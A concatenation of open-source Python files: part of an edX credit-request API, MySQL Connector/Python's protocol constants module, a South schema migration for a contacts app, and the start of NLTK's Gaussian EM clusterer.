"course_org": course_key.org,
"course_num": course_key.course,
"course_run": course_key.run,
"final_grade": final_grade,
"user_username": user.username,
"user_email": user.email,
"user_full_name": user.profile.name,
"user_mailing_address": (
user.profile.mailing_address
if user.profile.mailing_address is not None
else ""
),
"user_country": (
user.profile.country.code
if user.profile.country.code is not None
else ""
),
}
credit_request.parameters = parameters
credit_request.save()
if created:
log.info(u'Created new request for credit with UUID "%s"', credit_request.uuid)
else:
log.info(
u'Updated request for credit with UUID "%s" so the user can re-issue the request',
credit_request.uuid
)
# Sign the parameters using a secret key we share with the credit provider.
parameters["signature"] = signature(parameters, shared_secret_key)
return {
"url": credit_provider.provider_url,
"method": "POST",
"parameters": parameters
}
def update_credit_request_status(request_uuid, provider_id, status):
"""
Update the status of a credit request.
Approve or reject a request for a student to receive credit in a course
from a particular credit provider.
This function does NOT check that the status update is authorized.
The caller needs to handle authentication and authorization (checking the signature
of the message received from the credit provider)
The function is idempotent; if the request has already been updated to the status,
the function does nothing.
Arguments:
request_uuid (str): The unique identifier for the credit request.
provider_id (str): Identifier for the credit provider.
status (str): Either "approved" or "rejected"
Returns: None
Raises:
CreditRequestNotFound: No request exists that is associated with the given provider.
InvalidCreditStatus: The status is not either "approved" or "rejected".
"""
if status not in [CreditRequest.REQUEST_STATUS_APPROVED, CreditRequest.REQUEST_STATUS_REJECTED]:
raise InvalidCreditStatus
try:
request = CreditRequest.objects.get(uuid=request_uuid, provider__provider_id=provider_id)
old_status = request.status
request.status = status
request.save()
log.info(
u'Updated request with UUID "%s" from status "%s" to "%s" for provider with ID "%s".',
request_uuid, old_status, status, provider_id
)
except CreditRequest.DoesNotExist:
msg = (
u'Credit provider with ID "{provider_id}" attempted to '
u'update request with UUID "{request_uuid}", but no request '
u'with this UUID is associated with the provider.'
).format(provider_id=provider_id, request_uuid=request_uuid)
log.warning(msg)
raise CreditRequestNotFound(msg)
def get_credit_requests_for_user(username):
"""
Retrieve the status of a credit request.
Returns either "pending", "approved", or "rejected"
Arguments:
username (unicode): The username of the user who initiated the requests.
Returns: list
Example Usage:
>>> get_credit_request_status_for_user("bob")
[
{
"uuid": "557168d0f7664fe59097106c67c3f847",
"timestamp": 1434631630,
"course_key": "course-v1:HogwartsX+Potions101+1T2015",
"provider": {
"id": "HogwartsX",
"display_name": "Hogwarts School of Witchcraft and Wizardry",
},
"status": "pending" # or "approved" or "rejected"
}
]
"""
return CreditRequest.credit_requests_for_user(username)
def get_credit_request_status(username, course_key):
"""Get the credit request status.
    This function returns the status of the user's credit request for the given
    course. It returns the latest request status for any credit provider.
    The valid statuses are 'pending', 'approved' or 'rejected'.
Args:
username(str): The username of user
course_key(CourseKey): The course locator key
Returns:
A dictionary of credit request user has made if any
"""
credit_request = CreditRequest.get_user_request_status(username, course_key)
return {
"uuid": credit_request.uuid,
"timestamp": credit_request.modified,
"course_key": credit_request.course.course_key,
"provider": {
"id": credit_request.provider.provider_id,
"display_name": credit_request.provider.display_name
},
"status": credit_request.status
} if credit_request else {}
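# --- Illustrative flow sketch (editor addition; not part of the original module) ---
# Typical provider integration round-trip using the functions above; the provider
# id, username and UUID are placeholder values reused from the docstring examples.
#
#   params = create_credit_request(course_key, "hogwarts", "ron")
#   # ... the user's browser POSTs params["parameters"] to params["url"] ...
#   update_credit_request_status("557168d0f7664fe59097106c67c3f847",
#                                "hogwarts", "approved")
#   get_credit_request_status("ron", course_key)["status"]   # -> "approved"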
| agpl-3.0 |
drazenzadravec/nequeo | Tools/MySql/python-2.1.3/lib/mysql/connector/constants.py | 17 | 23017 | # MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2009, 2014, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Various MySQL constants and character sets
"""
from .errors import ProgrammingError
from .charsets import MYSQL_CHARACTER_SETS
MAX_PACKET_LENGTH = 16777215
NET_BUFFER_LENGTH = 8192
MAX_MYSQL_TABLE_COLUMNS = 4096
DEFAULT_CONFIGURATION = {
'database': None,
'user': '',
'password': '',
'host': '127.0.0.1',
'port': 3306,
'unix_socket': None,
'use_unicode': True,
'charset': 'utf8',
'collation': None,
'converter_class': None,
'autocommit': False,
'time_zone': None,
'sql_mode': None,
'get_warnings': False,
'raise_on_warnings': False,
'connection_timeout': None,
'client_flags': 0,
'compress': False,
'buffered': False,
'raw': False,
'ssl_ca': None,
'ssl_cert': None,
'ssl_key': None,
'ssl_verify_cert': False,
'passwd': None,
'db': None,
'connect_timeout': None,
'dsn': None,
'force_ipv6': False,
'auth_plugin': None,
'allow_local_infile': True,
'consume_results': False,
}
CNX_POOL_ARGS = ('pool_name', 'pool_size', 'pool_reset_session')
CNX_FABRIC_ARGS = ['fabric_host', 'fabric_username', 'fabric_password',
'fabric_port', 'fabric_connect_attempts',
'fabric_connect_delay', 'fabric_report_errors',
'fabric_ssl_ca', 'fabric_ssl_key', 'fabric_ssl_cert',
'fabric_user']
def flag_is_set(flag, flags):
"""Checks if the flag is set
Returns boolean"""
if (flags & flag) > 0:
return True
return False
class _Constants(object):
"""
Base class for constants
"""
prefix = ''
desc = {}
def __new__(cls):
raise TypeError("Can not instanciate from %s" % cls.__name__)
@classmethod
def get_desc(cls, name):
"""Get description of given constant"""
try:
return cls.desc[name][1]
except:
return None
@classmethod
def get_info(cls, num):
"""Get information about given constant"""
for name, info in cls.desc.items():
if info[0] == num:
return name
return None
@classmethod
def get_full_info(cls):
"""get full information about given constant"""
res = ()
try:
res = ["%s : %s" % (k, v[1]) for k, v in cls.desc.items()]
except Exception as err: # pylint: disable=W0703
res = ('No information found in constant class.%s' % err)
return res
class _Flags(_Constants):
"""Base class for classes describing flags
"""
@classmethod
def get_bit_info(cls, value):
"""Get the name of all bits set
Returns a list of strings."""
res = []
for name, info in cls.desc.items():
if value & info[0]:
res.append(name)
return res
class FieldType(_Constants):
"""MySQL Field Types
"""
prefix = 'FIELD_TYPE_'
DECIMAL = 0x00
TINY = 0x01
SHORT = 0x02
LONG = 0x03
FLOAT = 0x04
DOUBLE = 0x05
NULL = 0x06
TIMESTAMP = 0x07
LONGLONG = 0x08
INT24 = 0x09
DATE = 0x0a
TIME = 0x0b
DATETIME = 0x0c
YEAR = 0x0d
NEWDATE = 0x0e
VARCHAR = 0x0f
BIT = 0x10
NEWDECIMAL = 0xf6
ENUM = 0xf7
SET = 0xf8
TINY_BLOB = 0xf9
MEDIUM_BLOB = 0xfa
LONG_BLOB = 0xfb
BLOB = 0xfc
VAR_STRING = 0xfd
STRING = 0xfe
GEOMETRY = 0xff
desc = {
'DECIMAL': (0x00, 'DECIMAL'),
'TINY': (0x01, 'TINY'),
'SHORT': (0x02, 'SHORT'),
'LONG': (0x03, 'LONG'),
'FLOAT': (0x04, 'FLOAT'),
'DOUBLE': (0x05, 'DOUBLE'),
'NULL': (0x06, 'NULL'),
'TIMESTAMP': (0x07, 'TIMESTAMP'),
'LONGLONG': (0x08, 'LONGLONG'),
'INT24': (0x09, 'INT24'),
'DATE': (0x0a, 'DATE'),
'TIME': (0x0b, 'TIME'),
'DATETIME': (0x0c, 'DATETIME'),
'YEAR': (0x0d, 'YEAR'),
'NEWDATE': (0x0e, 'NEWDATE'),
'VARCHAR': (0x0f, 'VARCHAR'),
'BIT': (0x10, 'BIT'),
'NEWDECIMAL': (0xf6, 'NEWDECIMAL'),
'ENUM': (0xf7, 'ENUM'),
'SET': (0xf8, 'SET'),
'TINY_BLOB': (0xf9, 'TINY_BLOB'),
'MEDIUM_BLOB': (0xfa, 'MEDIUM_BLOB'),
'LONG_BLOB': (0xfb, 'LONG_BLOB'),
'BLOB': (0xfc, 'BLOB'),
'VAR_STRING': (0xfd, 'VAR_STRING'),
'STRING': (0xfe, 'STRING'),
'GEOMETRY': (0xff, 'GEOMETRY'),
}
@classmethod
def get_string_types(cls):
"""Get the list of all string types"""
return [
cls.VARCHAR,
cls.ENUM,
cls.VAR_STRING, cls.STRING,
]
@classmethod
def get_binary_types(cls):
"""Get the list of all binary types"""
return [
cls.TINY_BLOB, cls.MEDIUM_BLOB,
cls.LONG_BLOB, cls.BLOB,
]
@classmethod
def get_number_types(cls):
"""Get the list of all number types"""
return [
cls.DECIMAL, cls.NEWDECIMAL,
cls.TINY, cls.SHORT, cls.LONG,
cls.FLOAT, cls.DOUBLE,
cls.LONGLONG, cls.INT24,
cls.BIT,
cls.YEAR,
]
@classmethod
def get_timestamp_types(cls):
"""Get the list of all timestamp types"""
return [
cls.DATETIME, cls.TIMESTAMP,
]
class FieldFlag(_Flags):
"""MySQL Field Flags
Field flags as found in MySQL sources mysql-src/include/mysql_com.h
"""
_prefix = ''
NOT_NULL = 1 << 0
PRI_KEY = 1 << 1
UNIQUE_KEY = 1 << 2
MULTIPLE_KEY = 1 << 3
BLOB = 1 << 4
UNSIGNED = 1 << 5
ZEROFILL = 1 << 6
BINARY = 1 << 7
ENUM = 1 << 8
AUTO_INCREMENT = 1 << 9
TIMESTAMP = 1 << 10
SET = 1 << 11
NO_DEFAULT_VALUE = 1 << 12
ON_UPDATE_NOW = 1 << 13
NUM = 1 << 14
PART_KEY = 1 << 15
GROUP = 1 << 14 # SAME AS NUM !!!!!!!????
UNIQUE = 1 << 16
BINCMP = 1 << 17
GET_FIXED_FIELDS = 1 << 18
FIELD_IN_PART_FUNC = 1 << 19
FIELD_IN_ADD_INDEX = 1 << 20
FIELD_IS_RENAMED = 1 << 21
desc = {
'NOT_NULL': (1 << 0, "Field can't be NULL"),
'PRI_KEY': (1 << 1, "Field is part of a primary key"),
'UNIQUE_KEY': (1 << 2, "Field is part of a unique key"),
'MULTIPLE_KEY': (1 << 3, "Field is part of a key"),
'BLOB': (1 << 4, "Field is a blob"),
'UNSIGNED': (1 << 5, "Field is unsigned"),
'ZEROFILL': (1 << 6, "Field is zerofill"),
'BINARY': (1 << 7, "Field is binary "),
'ENUM': (1 << 8, "field is an enum"),
'AUTO_INCREMENT': (1 << 9, "field is a autoincrement field"),
'TIMESTAMP': (1 << 10, "Field is a timestamp"),
'SET': (1 << 11, "field is a set"),
'NO_DEFAULT_VALUE': (1 << 12, "Field doesn't have default value"),
'ON_UPDATE_NOW': (1 << 13, "Field is set to NOW on UPDATE"),
'NUM': (1 << 14, "Field is num (for clients)"),
'PART_KEY': (1 << 15, "Intern; Part of some key"),
'GROUP': (1 << 14, "Intern: Group field"), # Same as NUM
'UNIQUE': (1 << 16, "Intern: Used by sql_yacc"),
'BINCMP': (1 << 17, "Intern: Used by sql_yacc"),
'GET_FIXED_FIELDS': (1 << 18, "Used to get fields in item tree"),
'FIELD_IN_PART_FUNC': (1 << 19, "Field part of partition func"),
'FIELD_IN_ADD_INDEX': (1 << 20, "Intern: Field used in ADD INDEX"),
'FIELD_IS_RENAMED': (1 << 21, "Intern: Field is being renamed"),
}
class ServerCmd(_Constants):
"""MySQL Server Commands
"""
_prefix = 'COM_'
SLEEP = 0
QUIT = 1
INIT_DB = 2
QUERY = 3
FIELD_LIST = 4
CREATE_DB = 5
DROP_DB = 6
REFRESH = 7
SHUTDOWN = 8
STATISTICS = 9
PROCESS_INFO = 10
CONNECT = 11
PROCESS_KILL = 12
DEBUG = 13
PING = 14
TIME = 15
DELAYED_INSERT = 16
CHANGE_USER = 17
BINLOG_DUMP = 18
TABLE_DUMP = 19
CONNECT_OUT = 20
REGISTER_SLAVE = 21
STMT_PREPARE = 22
STMT_EXECUTE = 23
STMT_SEND_LONG_DATA = 24
STMT_CLOSE = 25
STMT_RESET = 26
SET_OPTION = 27
STMT_FETCH = 28
DAEMON = 29
BINLOG_DUMP_GTID = 30
RESET_CONNECTION = 31
desc = {
'SLEEP': (0, 'SLEEP'),
'QUIT': (1, 'QUIT'),
'INIT_DB': (2, 'INIT_DB'),
'QUERY': (3, 'QUERY'),
'FIELD_LIST': (4, 'FIELD_LIST'),
'CREATE_DB': (5, 'CREATE_DB'),
'DROP_DB': (6, 'DROP_DB'),
'REFRESH': (7, 'REFRESH'),
'SHUTDOWN': (8, 'SHUTDOWN'),
'STATISTICS': (9, 'STATISTICS'),
'PROCESS_INFO': (10, 'PROCESS_INFO'),
'CONNECT': (11, 'CONNECT'),
'PROCESS_KILL': (12, 'PROCESS_KILL'),
'DEBUG': (13, 'DEBUG'),
'PING': (14, 'PING'),
'TIME': (15, 'TIME'),
'DELAYED_INSERT': (16, 'DELAYED_INSERT'),
'CHANGE_USER': (17, 'CHANGE_USER'),
'BINLOG_DUMP': (18, 'BINLOG_DUMP'),
'TABLE_DUMP': (19, 'TABLE_DUMP'),
'CONNECT_OUT': (20, 'CONNECT_OUT'),
'REGISTER_SLAVE': (21, 'REGISTER_SLAVE'),
'STMT_PREPARE': (22, 'STMT_PREPARE'),
'STMT_EXECUTE': (23, 'STMT_EXECUTE'),
'STMT_SEND_LONG_DATA': (24, 'STMT_SEND_LONG_DATA'),
'STMT_CLOSE': (25, 'STMT_CLOSE'),
'STMT_RESET': (26, 'STMT_RESET'),
'SET_OPTION': (27, 'SET_OPTION'),
'STMT_FETCH': (28, 'STMT_FETCH'),
'DAEMON': (29, 'DAEMON'),
'BINLOG_DUMP_GTID': (30, 'BINLOG_DUMP_GTID'),
'RESET_CONNECTION': (31, 'RESET_CONNECTION'),
}
class ClientFlag(_Flags):
"""MySQL Client Flags
Client options as found in the MySQL sources mysql-src/include/mysql_com.h
"""
LONG_PASSWD = 1 << 0
FOUND_ROWS = 1 << 1
LONG_FLAG = 1 << 2
CONNECT_WITH_DB = 1 << 3
NO_SCHEMA = 1 << 4
COMPRESS = 1 << 5
ODBC = 1 << 6
LOCAL_FILES = 1 << 7
IGNORE_SPACE = 1 << 8
PROTOCOL_41 = 1 << 9
INTERACTIVE = 1 << 10
SSL = 1 << 11
IGNORE_SIGPIPE = 1 << 12
TRANSACTIONS = 1 << 13
RESERVED = 1 << 14
SECURE_CONNECTION = 1 << 15
MULTI_STATEMENTS = 1 << 16
MULTI_RESULTS = 1 << 17
PS_MULTI_RESULTS = 1 << 18
PLUGIN_AUTH = 1 << 19
CONNECT_ARGS = 1 << 20
PLUGIN_AUTH_LENENC_CLIENT_DATA = 1 << 21
CAN_HANDLE_EXPIRED_PASSWORDS = 1 << 22
SSL_VERIFY_SERVER_CERT = 1 << 30
REMEMBER_OPTIONS = 1 << 31
desc = {
'LONG_PASSWD': (1 << 0, 'New more secure passwords'),
'FOUND_ROWS': (1 << 1, 'Found instead of affected rows'),
'LONG_FLAG': (1 << 2, 'Get all column flags'),
'CONNECT_WITH_DB': (1 << 3, 'One can specify db on connect'),
'NO_SCHEMA': (1 << 4, "Don't allow database.table.column"),
'COMPRESS': (1 << 5, 'Can use compression protocol'),
'ODBC': (1 << 6, 'ODBC client'),
'LOCAL_FILES': (1 << 7, 'Can use LOAD DATA LOCAL'),
'IGNORE_SPACE': (1 << 8, "Ignore spaces before ''"),
'PROTOCOL_41': (1 << 9, 'New 4.1 protocol'),
'INTERACTIVE': (1 << 10, 'This is an interactive client'),
'SSL': (1 << 11, 'Switch to SSL after handshake'),
'IGNORE_SIGPIPE': (1 << 12, 'IGNORE sigpipes'),
'TRANSACTIONS': (1 << 13, 'Client knows about transactions'),
'RESERVED': (1 << 14, 'Old flag for 4.1 protocol'),
'SECURE_CONNECTION': (1 << 15, 'New 4.1 authentication'),
'MULTI_STATEMENTS': (1 << 16, 'Enable/disable multi-stmt support'),
'MULTI_RESULTS': (1 << 17, 'Enable/disable multi-results'),
'SSL_VERIFY_SERVER_CERT': (1 << 30, ''),
'REMEMBER_OPTIONS': (1 << 31, ''),
}
default = [
LONG_PASSWD,
LONG_FLAG,
CONNECT_WITH_DB,
PROTOCOL_41,
TRANSACTIONS,
SECURE_CONNECTION,
MULTI_STATEMENTS,
MULTI_RESULTS,
LOCAL_FILES,
]
@classmethod
def get_default(cls):
"""Get the default client options set
Returns a flag with all the default client options set"""
flags = 0
for option in cls.default:
flags |= option
return flags
class ServerFlag(_Flags):
"""MySQL Server Flags
Server flags as found in the MySQL sources mysql-src/include/mysql_com.h
"""
_prefix = 'SERVER_'
STATUS_IN_TRANS = 1 << 0
STATUS_AUTOCOMMIT = 1 << 1
MORE_RESULTS_EXISTS = 1 << 3
QUERY_NO_GOOD_INDEX_USED = 1 << 4
QUERY_NO_INDEX_USED = 1 << 5
STATUS_CURSOR_EXISTS = 1 << 6
STATUS_LAST_ROW_SENT = 1 << 7
STATUS_DB_DROPPED = 1 << 8
STATUS_NO_BACKSLASH_ESCAPES = 1 << 9
desc = {
'SERVER_STATUS_IN_TRANS': (1 << 0,
'Transaction has started'),
'SERVER_STATUS_AUTOCOMMIT': (1 << 1,
'Server in auto_commit mode'),
'SERVER_MORE_RESULTS_EXISTS': (1 << 3,
'Multi query - '
'next query exists'),
'SERVER_QUERY_NO_GOOD_INDEX_USED': (1 << 4, ''),
'SERVER_QUERY_NO_INDEX_USED': (1 << 5, ''),
'SERVER_STATUS_CURSOR_EXISTS': (1 << 6, ''),
'SERVER_STATUS_LAST_ROW_SENT': (1 << 7, ''),
'SERVER_STATUS_DB_DROPPED': (1 << 8, 'A database was dropped'),
'SERVER_STATUS_NO_BACKSLASH_ESCAPES': (1 << 9, ''),
}
class RefreshOption(_Constants):
"""MySQL Refresh command options
Options used when sending the COM_REFRESH server command.
"""
_prefix = 'REFRESH_'
GRANT = 1 << 0
LOG = 1 << 1
TABLES = 1 << 2
HOST = 1 << 3
STATUS = 1 << 4
THREADS = 1 << 5
SLAVE = 1 << 6
desc = {
'GRANT': (1 << 0, 'Refresh grant tables'),
'LOG': (1 << 1, 'Start on new log file'),
'TABLES': (1 << 2, 'close all tables'),
'HOSTS': (1 << 3, 'Flush host cache'),
'STATUS': (1 << 4, 'Flush status variables'),
'THREADS': (1 << 5, 'Flush thread cache'),
'SLAVE': (1 << 6, 'Reset master info and restart slave thread'),
}
class ShutdownType(_Constants):
"""MySQL Shutdown types
Shutdown types used by the COM_SHUTDOWN server command.
"""
_prefix = ''
SHUTDOWN_DEFAULT = 0
SHUTDOWN_WAIT_CONNECTIONS = 1
SHUTDOWN_WAIT_TRANSACTIONS = 2
SHUTDOWN_WAIT_UPDATES = 8
SHUTDOWN_WAIT_ALL_BUFFERS = 16
SHUTDOWN_WAIT_CRITICAL_BUFFERS = 17
KILL_QUERY = 254
KILL_CONNECTION = 255
desc = {
'SHUTDOWN_DEFAULT': (
SHUTDOWN_DEFAULT,
"defaults to SHUTDOWN_WAIT_ALL_BUFFERS"),
'SHUTDOWN_WAIT_CONNECTIONS': (
SHUTDOWN_WAIT_CONNECTIONS,
"wait for existing connections to finish"),
'SHUTDOWN_WAIT_TRANSACTIONS': (
SHUTDOWN_WAIT_TRANSACTIONS,
"wait for existing trans to finish"),
'SHUTDOWN_WAIT_UPDATES': (
SHUTDOWN_WAIT_UPDATES,
"wait for existing updates to finish"),
'SHUTDOWN_WAIT_ALL_BUFFERS': (
SHUTDOWN_WAIT_ALL_BUFFERS,
"flush InnoDB and other storage engine buffers"),
'SHUTDOWN_WAIT_CRITICAL_BUFFERS': (
SHUTDOWN_WAIT_CRITICAL_BUFFERS,
"don't flush InnoDB buffers, "
"flush other storage engines' buffers"),
'KILL_QUERY': (
KILL_QUERY,
"(no description)"),
'KILL_CONNECTION': (
KILL_CONNECTION,
"(no description)"),
}
class CharacterSet(_Constants):
"""MySQL supported character sets and collations
List of character sets with their collations supported by MySQL. This
maps to the character set we get from the server within the handshake
packet.
    The list is hardcoded so we avoid a database query when getting the
name of the used character set or collation.
"""
desc = MYSQL_CHARACTER_SETS
# Multi-byte character sets which use 5c (backslash) in characters
slash_charsets = (1, 13, 28, 84, 87, 88)
@classmethod
def get_info(cls, setid):
"""Retrieves character set information as tuple using an ID
Retrieves character set and collation information based on the
given MySQL ID.
Raises ProgrammingError when character set is not supported.
Returns a tuple.
"""
try:
return cls.desc[setid][0:2]
except IndexError:
raise ProgrammingError(
"Character set '{0}' unsupported".format(setid))
@classmethod
def get_desc(cls, setid):
"""Retrieves character set information as string using an ID
Retrieves character set and collation information based on the
given MySQL ID.
Returns a tuple.
"""
try:
return "%s/%s" % cls.get_info(setid)
except:
raise
@classmethod
def get_default_collation(cls, charset):
"""Retrieves the default collation for given character set
Raises ProgrammingError when character set is not supported.
Returns list (collation, charset, index)
"""
if isinstance(charset, int):
try:
info = cls.desc[charset]
return info[1], info[0], charset
except:
ProgrammingError("Character set ID '%s' unsupported." % (
charset))
for cid, info in enumerate(cls.desc):
if info is None:
continue
if info[0] == charset and info[2] is True:
return info[1], info[0], cid
raise ProgrammingError("Character set '%s' unsupported." % (charset))
@classmethod
def get_charset_info(cls, charset=None, collation=None):
"""Get character set information using charset name and/or collation
Retrieves character set and collation information given character
set name and/or a collation name.
If charset is an integer, it will look up the character set based
on the MySQL's ID.
For example:
get_charset_info('utf8',None)
get_charset_info(collation='utf8_general_ci')
get_charset_info(47)
Raises ProgrammingError when character set is not supported.
Returns a tuple with (id, characterset name, collation)
"""
if isinstance(charset, int):
try:
info = cls.desc[charset]
return (charset, info[0], info[1])
except IndexError:
ProgrammingError("Character set ID {0} unknown.".format(
charset))
if charset is not None and collation is None:
info = cls.get_default_collation(charset)
return (info[2], info[1], info[0])
elif charset is None and collation is not None:
for cid, info in enumerate(cls.desc):
if info is None:
continue
if collation == info[1]:
return (cid, info[0], info[1])
raise ProgrammingError("Collation '{0}' unknown.".format(collation))
else:
for cid, info in enumerate(cls.desc):
if info is None:
continue
if info[0] == charset and info[1] == collation:
return (cid, info[0], info[1])
raise ProgrammingError("Character set '{0}' unknown.".format(
charset))
@classmethod
def get_supported(cls):
"""Retrieves a list with names of all supproted character sets
Returns a tuple.
"""
res = []
for info in cls.desc:
if info and info[0] not in res:
res.append(info[0])
return tuple(res)
class SQLMode(_Constants): # pylint: disable=R0921
"""MySQL SQL Modes
The numeric values of SQL Modes are not interesting, only the names
are used when setting the SQL_MODE system variable using the MySQL
SET command.
See http://dev.mysql.com/doc/refman/5.6/en/server-sql-mode.html
"""
_prefix = 'MODE_'
REAL_AS_FLOAT = 'REAL_AS_FLOAT'
PIPES_AS_CONCAT = 'PIPES_AS_CONCAT'
ANSI_QUOTES = 'ANSI_QUOTES'
IGNORE_SPACE = 'IGNORE_SPACE'
NOT_USED = 'NOT_USED'
ONLY_FULL_GROUP_BY = 'ONLY_FULL_GROUP_BY'
NO_UNSIGNED_SUBTRACTION = 'NO_UNSIGNED_SUBTRACTION'
NO_DIR_IN_CREATE = 'NO_DIR_IN_CREATE'
POSTGRESQL = 'POSTGRESQL'
ORACLE = 'ORACLE'
MSSQL = 'MSSQL'
DB2 = 'DB2'
MAXDB = 'MAXDB'
NO_KEY_OPTIONS = 'NO_KEY_OPTIONS'
NO_TABLE_OPTIONS = 'NO_TABLE_OPTIONS'
NO_FIELD_OPTIONS = 'NO_FIELD_OPTIONS'
MYSQL323 = 'MYSQL323'
MYSQL40 = 'MYSQL40'
ANSI = 'ANSI'
NO_AUTO_VALUE_ON_ZERO = 'NO_AUTO_VALUE_ON_ZERO'
NO_BACKSLASH_ESCAPES = 'NO_BACKSLASH_ESCAPES'
STRICT_TRANS_TABLES = 'STRICT_TRANS_TABLES'
STRICT_ALL_TABLES = 'STRICT_ALL_TABLES'
NO_ZERO_IN_DATE = 'NO_ZERO_IN_DATE'
NO_ZERO_DATE = 'NO_ZERO_DATE'
INVALID_DATES = 'INVALID_DATES'
ERROR_FOR_DIVISION_BY_ZERO = 'ERROR_FOR_DIVISION_BY_ZERO'
TRADITIONAL = 'TRADITIONAL'
NO_AUTO_CREATE_USER = 'NO_AUTO_CREATE_USER'
HIGH_NOT_PRECEDENCE = 'HIGH_NOT_PRECEDENCE'
NO_ENGINE_SUBSTITUTION = 'NO_ENGINE_SUBSTITUTION'
PAD_CHAR_TO_FULL_LENGTH = 'PAD_CHAR_TO_FULL_LENGTH'
@classmethod
def get_desc(cls, name):
raise NotImplementedError
@classmethod
def get_info(cls, number):
raise NotImplementedError
@classmethod
def get_full_info(cls):
"""Returns a sequence of all available SQL Modes
This class method returns a tuple containing all SQL Mode names. The
names will be alphabetically sorted.
Returns a tuple.
"""
res = []
for key in vars(cls).keys():
if not key.startswith('_') \
and not hasattr(getattr(cls, key), '__call__'):
res.append(key)
return tuple(sorted(res))
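# --- Editor addition: minimal self-check of the helpers above; not part of the
# original module. The 'utf8' lookup assumes that character set is present in
# MYSQL_CHARACTER_SETS, which ships with the connector.
if __name__ == '__main__':
    _flags = ClientFlag.get_default() | ClientFlag.COMPRESS
    # get_bit_info() names every flag bit that is set in the composed value.
    assert 'COMPRESS' in ClientFlag.get_bit_info(_flags)
    _cid, _charset, _collation = CharacterSet.get_charset_info(charset='utf8')
    assert _charset == 'utf8'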
| gpl-2.0 |
TEDICpy/write-it | contactos/migrations/0002_auto__add_field_contact_is_bounced.py | 2 | 2566 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Contact.is_bounced'
db.add_column(u'contactos_contact', 'is_bounced',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Contact.is_bounced'
db.delete_column(u'contactos_contact', 'is_bounced')
models = {
u'contactos.contact': {
'Meta': {'object_name': 'Contact'},
'contact_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contactos.ContactType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_bounced': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['popit.Person']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '512'})
},
u'contactos.contacttype': {
'Meta': {'object_name': 'ContactType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'popit.apiinstance': {
'Meta': {'object_name': 'ApiInstance'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('popit.fields.ApiInstanceURLField', [], {'unique': 'True', 'max_length': '200'})
},
u'popit.person': {
'Meta': {'object_name': 'Person'},
'api_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['popit.ApiInstance']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'popit_url': ('popit.fields.PopItURLField', [], {'default': "''", 'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
    complete_apps = ['contactos']
| gpl-3.0 |
Jaemu/haiku.py | nltk/cluster/em.py | 5 | 9530 | # Natural Language Toolkit: Expectation Maximization Clusterer
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Trevor Cohn <[email protected]>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
from __future__ import print_function
import numpy
from util import VectorSpaceClusterer
class EMClusterer(VectorSpaceClusterer):
"""
The Gaussian EM clusterer models the vectors as being produced by
a mixture of k Gaussian sources. The parameters of these sources
(prior probability, mean and covariance matrix) are then found to
maximise the likelihood of the given data. This is done with the
expectation maximisation algorithm. It starts with k arbitrarily
chosen means, priors and covariance matrices. It then calculates
the membership probabilities for each vector in each of the
clusters; this is the 'E' step. The cluster parameters are then
updated in the 'M' step using the maximum likelihood estimate from
the cluster membership probabilities. This process continues until
the likelihood of the data does not significantly increase.
"""
def __init__(self, initial_means, priors=None, covariance_matrices=None,
conv_threshold=1e-6, bias=0.1, normalise=False,
svd_dimensions=None):
"""
Creates an EM clusterer with the given starting parameters,
convergence threshold and vector mangling parameters.
:param initial_means: the means of the gaussian cluster centers
:type initial_means: [seq of] numpy array or seq of SparseArray
:param priors: the prior probability for each cluster
:type priors: numpy array or seq of float
:param covariance_matrices: the covariance matrix for each cluster
:type covariance_matrices: [seq of] numpy array
:param conv_threshold: maximum change in likelihood before deemed
convergent
:type conv_threshold: int or float
:param bias: variance bias used to ensure non-singular covariance
matrices
:type bias: float
:param normalise: should vectors be normalised to length 1
:type normalise: boolean
:param svd_dimensions: number of dimensions to use in reducing vector
               dimensionality with SVD
:type svd_dimensions: int
"""
VectorSpaceClusterer.__init__(self, normalise, svd_dimensions)
self._means = numpy.array(initial_means, numpy.float64)
self._num_clusters = len(initial_means)
self._conv_threshold = conv_threshold
self._covariance_matrices = covariance_matrices
self._priors = priors
self._bias = bias
def num_clusters(self):
return self._num_clusters
def cluster_vectorspace(self, vectors, trace=False):
assert len(vectors) > 0
# set the parameters to initial values
dimensions = len(vectors[0])
means = self._means
priors = self._priors
if not priors:
priors = self._priors = numpy.ones(self._num_clusters,
numpy.float64) / self._num_clusters
covariances = self._covariance_matrices
if not covariances:
covariances = self._covariance_matrices = \
